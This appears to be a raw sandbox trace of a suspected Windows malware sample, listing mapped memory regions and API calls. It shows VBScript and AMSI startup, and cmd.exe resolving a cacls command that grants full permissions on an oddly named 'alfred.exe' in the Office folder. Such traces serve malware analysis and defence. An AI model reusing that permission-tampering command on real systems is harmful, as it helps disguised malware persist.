mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 7657 start_va = 0x7660000 end_va = 0x76a2fff entry_point = 0x7660000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000f.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000f.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000f.db") Region: id = 7783 start_va = 0x76b0000 end_va = 0x76b3fff entry_point = 0x76b0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 7784 start_va = 0x76c0000 end_va = 0x774afff entry_point = 0x76c0000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 7830 start_va = 0x7750000 end_va = 0x7760fff entry_point = 0x7750000 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\propsys.dll.mui") Region: id = 8005 start_va = 0x7770000 end_va = 0x7773fff entry_point = 0x7770000 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 8006 start_va = 0x7780000 end_va = 0x7792fff entry_point = 0x7780000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001b.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000001b.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001b.db") Region: id = 8007 start_va = 0x77a0000 end_va = 0x77a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000077a0000" filename = "" Region: id = 8008 start_va = 0x73e60000 end_va = 0x73fbffff entry_point = 0x73e60000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 8298 start_va = 0x73b90000 end_va = 0x73e50fff entry_point = 0x73b90000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 8301 start_va = 0x7770000 end_va = 0x7770fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007770000" filename = "" Region: id = 8302 start_va = 0x77b0000 end_va = 0x77b3fff entry_point = 0x77b0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Thread: id = 119 os_tid = 0xb44 [0208.126] __dllonexit () returned 0x744fcc00 [0208.127] __dllonexit () returned 0x744fcc10 [0208.127] __dllonexit () returned 0x744fcc20 [0208.411] GetUserDefaultLCID () returned 0x409 [0208.411] GetVersion () returned 0x2800000a [0208.411] GetModuleHandleW (lpModuleName="api-ms-win-core-processthreads-l1-1-2.dll") returned 0x75130000 [0208.411] GetProcAddress (hModule=0x75130000, lpProcName="QueryProtectedPolicy") returned 0x74df9ec0 [0208.411] VirtualProtect (in: lpAddress=0x7452e32c, dwSize=0x4, flNewProtect=0x4, lpflOldProtect=0x4e4d790 | out: lpflOldProtect=0x4e4d790*=0x2) returned 1 [0208.411] VirtualProtect (in: lpAddress=0x7452e32c, dwSize=0x4, flNewProtect=0x2, lpflOldProtect=0x4e4d790 | out: lpflOldProtect=0x4e4d790*=0x4) returned 1 [0208.592] GetUserDefaultLCID () returned 0x409 [0208.592] GetACP () returned 0x4e4 [0208.592] LoadLibraryExA (lpLibFileName="amsi.dll", hFile=0x0, dwFlags=0x0) returned 0x744b0000 [0209.155] GetProcAddress (hModule=0x744b0000, lpProcName="AmsiInitialize") returned 0x744b3d40 [0209.155] GetProcAddress (hModule=0x744b0000, lpProcName="AmsiScanString") returned 0x744b40e0 [0209.155] AmsiInitialize () returned 0x0 [0209.710] GetCurrentThreadId () returned 0xb44 [0209.710] GetCurrentThreadId () returned 0xb44 [0209.710] GetCurrentThreadId () returned 0xb44 [0209.711] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0209.711] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x4e4ee38, cchData=6 | out: lpLCData="1252") returned 5 [0209.711] IsValidCodePage (CodePage=0x4e4) returned 1 [0209.711] GetModuleHandleW (lpModuleName="api-ms-win-core-delayload-l1-1-1.dll") returned 0x74d30000 [0209.711] GetProcAddress (hModule=0x74d30000, lpProcName="ResolveDelayLoadedAPI") returned 0x74de4e60 [0209.711] GetProcAddress (hModule=0x74d30000, lpProcName="ResolveDelayLoadsFromDll") returned 0x74e60770 [0209.711] ResolveDelayLoadedAPI () returned 0x75018200 [0209.712] CoCreateInstance (in: rclsid=0x744c3548*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x744c3528*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x52c2a84 | out: ppv=0x52c2a84*=0x5150478) returned 0x0 [0209.712] IUnknown:AddRef (This=0x5150478) returned 0x2 [0209.712] GetCurrentProcessId () returned 0xe2c [0209.712] GetCurrentThreadId () returned 0xb44 [0209.712] GetTickCount () returned 0x3ec74 [0209.712] ISystemDebugEventFire:BeginSession (This=0x5150478, guidSourceID=0x744c2fb8, strSessionName="VBScript:00003628:00002884:18257140") returned 0x0 [0209.712] GetCurrentThreadId () returned 0xb44 [0209.712] GetCurrentThreadId () returned 0xb44 [0218.039] GetVersionExA (in: lpVersionInformation=0x4e4dad4*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x4e4db14, dwMinorVersion=0x779cdba8, dwBuildNumber=0x80, dwPlatformId=0x0, szCSDVersion="\xc0\x60\x42\x74\x80") | out: lpVersionInformation=0x4e4dad4*(dwOSVersionInfoSize=0x94, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x2800, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0218.039] GetUserDefaultLCID () returned 0x409 [0218.039] GetLocaleInfoW (in: Locale=0x409, LCType=0x20000070, lpLCData=0x4e4d690, cchData=2 | out: lpLCData="") returned 2 [0218.040] IsFileSupportedName () returned 0x1 [0218.040] _wcsicmp (_String1=".vbs", _String2=".vbs") returned 0 [0218.045] GetSignedDataMsg () returned 0x0 [0218.045] GetCurrentProcess () returned 0xffffffff [0218.045] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x1a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x4e4dfc0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x4e4dfc0*=0x1f4) returned 1 [0218.045] GetFileSize (in: hFile=0x1f4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x10b [0218.045] SetFilePointer (in: hFile=0x1f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0218.045] ReadFile (in: hFile=0x1f4, lpBuffer=0x52c8020, nNumberOfBytesToRead=0x10b, lpNumberOfBytesRead=0x4e4dfa0, lpOverlapped=0x0 | out: lpBuffer=0x52c8020*, lpNumberOfBytesRead=0x4e4dfa0*=0x10b, lpOverlapped=0x0) returned 1 [0218.045] CoInitialize (pvReserved=0x0) returned 0x1 [0218.045] CoCreateInstance (in: rclsid=0x744211b0*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x744211c0*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppv=0x4e4df7c | out: ppv=0x4e4df7c*=0x52c8418) returned 0x0 [0220.532] __dllonexit () returned 0x74351490 [0220.532] __dllonexit () returned 0x743514b0 [0220.566] GetVersionExA (in: lpVersionInformation=0x4e4c808*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x4e4c854, dwMinorVersion=0x74350942, dwBuildNumber=0x74350c0e, dwPlatformId=0x74350937, szCSDVersion="\x4d\xd4\x58\x77\x03") | out: lpVersionInformation=0x4e4c808*(dwOSVersionInfoSize=0x94, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x2800, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0220.566] GetProcessWindowStation () returned 0x94 [0220.566] GetUserObjectInformationA (in: hObj=0x94, nIndex=1, pvInfo=0x4e4c89c, nLength=0xc, lpnLengthNeeded=0x4e4c804 | out: pvInfo=0x4e4c89c, lpnLengthNeeded=0x4e4c804) returned 1 [0220.678] DllGetClassObject (in: rclsid=0x514e098*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), riid=0x74f8c3c4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x4e4d0dc | out: ppv=0x4e4d0dc*=0x52c8170) returned 0x0 [0220.679] IClassFactory:CreateInstance (in: This=0x52c8170, pUnkOuter=0x0, riid=0x4e4db10*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x4e4d0c4 | out: ppvObject=0x4e4d0c4*=0x52c8418) returned 0x0 [0220.679] GetSystemInfo (in: lpSystemInfo=0x4e4cfd4 | out: lpSystemInfo=0x4e4cfd4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0220.679] VirtualQuery (in: lpAddress=0x4e4d018, lpBuffer=0x4e4cff8, dwLength=0x1c | out: lpBuffer=0x4e4cff8*(BaseAddress=0x4e4d000, AllocationBase=0x4d50000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.679] IUnknown:AddRef (This=0x52c8418) returned 0x2 [0220.679] IUnknown:Release (This=0x52c8418) returned 0x1 [0220.679] IUnknown:Release (This=0x52c8170) returned 0x0 [0220.679] IUnknown:QueryInterface (in: This=0x52c8418, riid=0x744211c0*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x4e4df38 | out: ppvObject=0x4e4df38*=0x52c8418) returned 0x0 [0220.679] IUnknown:Release (This=0x52c8418) returned 0x1 [0220.680] _strnicmp (_Str1="") returned 1 [0206.504] _get_osfhandle (_FileHandle=1) returned 0x3c [0206.504] GetFileType (hFile=0x3c) returned 0x2 [0206.504] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0206.504] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfced14 | out: lpMode=0xfced14) returned 1 [0206.504] _get_osfhandle (_FileHandle=1) returned 0x3c [0206.504] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xfced2c, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0xfced2c*=0x1e) returned 1 [0206.505] _get_osfhandle (_FileHandle=1) returned 0x3c [0206.505] GetFileType (hFile=0x3c) returned 0x2 [0206.505] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0206.505] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcefb4 | out: lpMode=0xfcefb4) returned 1 [0206.505] _get_osfhandle (_FileHandle=1) returned 0x3c [0206.505] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1257940*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0xfcefcc, lpReserved=0x0 | out: lpBuffer=0x1257940*, lpNumberOfCharsWritten=0xfcefcc*=0x5) returned 1 [0206.506] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xfcefd4 | out: _Buffer=" \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\" /E /G CIiHmnxMn6Ps:F /C ") returned 75 [0206.506] _get_osfhandle (_FileHandle=1) returned 0x3c [0206.506] GetFileType (hFile=0x3c) returned 0x2 [0206.506] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0206.506] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcefac | out: lpMode=0xfcefac) returned 1 [0206.506] _get_osfhandle (_FileHandle=1) returned 0x3c [0206.506] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x4b, lpNumberOfCharsWritten=0xfcefc4, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xfcefc4*=0x4b) returned 1 [0206.506] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xfcefe8 | out: _Buffer="\r\n") returned 2 [0206.506] _get_osfhandle (_FileHandle=1) returned 0x3c [0206.506] GetFileType (hFile=0x3c) returned 0x2 [0206.506] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0206.506] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcefc0 | out: lpMode=0xfcefc0) returned 1 [0206.506] _get_osfhandle (_FileHandle=1) returned 0x3c [0206.506] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xfcefd8, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xfcefd8*=0x2) returned 1 [0206.507] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0206.507] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0206.507] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0206.507] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0206.507] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0206.507] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0206.507] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0206.507] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0206.507] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0206.507] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0206.507] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0206.507] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0206.507] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0206.507] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0206.507] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0206.507] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0206.507] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0206.507] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0206.507] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0206.507] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0206.507] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0206.507] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0206.507] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0206.507] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0206.507] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0206.507] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0206.507] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0206.507] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0206.507] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0206.507] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0206.507] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0206.507] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0206.507] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0206.507] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0206.507] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0206.507] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0206.507] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0206.507] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0206.507] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0206.507] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0206.507] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0206.507] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0206.508] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0206.508] SetErrorMode (uMode=0x0) returned 0x0 [0206.508] SetErrorMode (uMode=0x1) returned 0x0 [0206.508] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x125bed0, lpFilePart=0xfced84 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xfced84*="Desktop") returned 0x1d [0206.508] SetErrorMode (uMode=0x0) returned 0x1 [0206.508] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0206.508] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0206.509] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0206.509] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0206.509] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xfceb10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xfceb10) returned 0xffffffff [0206.510] GetLastError () returned 0x2 [0206.510] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0206.510] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xfceb10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xfceb10) returned 0xffffffff [0206.510] GetLastError () returned 0x2 [0206.510] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0206.510] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xfceb10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xfceb10) returned 0x125c268 [0206.510] FindClose (in: hFindFile=0x125c268 | out: hFindFile=0x125c268) returned 1 [0206.510] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0xfceb10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xfceb10) returned 0xffffffff [0206.510] GetLastError () returned 0x2 [0206.510] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0xfceb10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xfceb10) returned 0x125c268 [0206.511] FindClose (in: hFindFile=0x125c268 | out: hFindFile=0x125c268) returned 1 [0206.511] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0206.511] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0206.511] GetConsoleTitleW (in: lpConsoleTitle=0xfceb58, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0206.511] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0206.511] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0206.511] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0206.511] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0206.511] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0206.511] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0206.511] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0206.511] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0206.511] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0206.511] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0206.511] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0206.511] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0206.511] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0206.511] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0206.511] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0206.511] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0206.511] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0206.511] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0206.511] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0206.511] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0206.511] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0206.511] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0206.512] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0206.512] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0206.512] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0206.512] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0206.512] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0206.512] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0206.512] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0206.512] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0206.512] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0206.512] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0206.512] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0206.512] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0206.512] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0206.512] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0206.512] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0206.512] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0206.512] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0206.512] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0206.512] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0206.512] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0206.512] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0206.512] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0206.512] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0206.512] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0206.512] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0206.512] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0206.512] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0206.512] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0206.512] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0206.512] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0206.512] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0206.512] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0206.512] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0206.512] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0206.512] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0206.512] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0206.512] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0206.512] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0206.512] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0206.512] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0206.512] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0206.512] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0206.512] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0206.512] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0206.512] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0206.512] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0206.512] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0206.512] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0206.513] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0206.513] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0206.513] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0206.513] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0206.513] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0206.513] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0206.513] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0206.513] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0206.513] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0206.513] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0206.513] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0206.513] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0206.513] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0206.513] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0206.513] _wcsicmp (_String1="cacls", _String2="FOR") returned -3 [0206.513] _wcsicmp (_String1="cacls", _String2="IF") returned -6 [0206.513] _wcsicmp (_String1="cacls", _String2="REM") returned -15 [0206.513] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0206.513] SetErrorMode (uMode=0x0) returned 0x0 [0206.513] SetErrorMode (uMode=0x1) returned 0x0 [0206.513] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x125c540, lpFilePart=0xfce664 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xfce664*="Desktop") returned 0x1d [0206.513] SetErrorMode (uMode=0x0) returned 0x1 [0206.513] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0206.513] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0206.513] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0206.514] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0206.514] FindFirstFileExW (in: 